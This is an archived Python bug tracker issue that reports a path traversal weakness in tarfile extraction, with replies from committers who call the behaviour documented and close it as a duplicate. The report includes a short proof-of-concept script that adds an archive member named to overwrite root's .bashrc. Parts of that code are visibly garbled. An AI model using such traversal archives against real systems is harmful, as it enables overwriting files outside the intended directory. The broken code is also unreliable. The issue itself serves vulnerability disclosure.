This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Title: tarfile missing cross-directory checking
Type: security Stage: resolved
Components: Library (Lib) Versions: Python 3.8
Status: closed Resolution: duplicate
Dependencies: Superseder: tarfile: Traversal attack vulnerability
View: 21109
Assigned To: Nosy List: eric.smith, martin.panter, xiongpanju
Priority: normal Keywords:

Created on 2021-09-11 07:45 by xiongpanju, last changed 2022-04-11 14:59 by admin. This issue is now closed.

Messages (3)
msg401631 - (view) Author: daji ma (xiongpanju) Date: 2021-09-11 07:45
tarfile missing cross-directory checking, like ../ or ..\, this  potentially cause cross-directory decompression.
the exp:
# -*- coding: utf-8 -*-
import tarfile

def extract_tar(file_path, dest_path):
        with, 'r') as src_file:
            for info in src_file.getmembers():
                src_file.extract(, dest_path)
        return True
    except (IOError, OSError, tarfile.TarError):
        return False

def make_tar():'x.tar.gz','w:gz')
    tar_file.add('bashrc', '/../../../../root/.bashrc')

if __name__ == '__main__':
    extract_tar('x.tar.gz', 'xx')
msg401643 - (view) Author: Eric V. Smith (eric.smith) * (Python committer) Date: 2021-09-11 17:05
This is documented in the tarfile docs:


Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with "/" or filenames with two dots "..".
msg402194 - (view) Author: Martin Panter (martin.panter) * (Python committer) Date: 2021-09-20 06:34
Issue 21109 has been open for a while and is the same as this, if I am not mistaken.
Date User Action Args
2022-04-11 14:59:49adminsetgithub: 89333
2021-09-20 06:34:12martin.pantersetstatus: open -> closed

superseder: tarfile: Traversal attack vulnerability

nosy: + martin.panter
messages: + msg402194
resolution: duplicate
stage: resolved
2021-09-11 17:05:24eric.smithsetnosy: + eric.smith
messages: + msg401643
2021-09-11 07:45:41xiongpanjucreate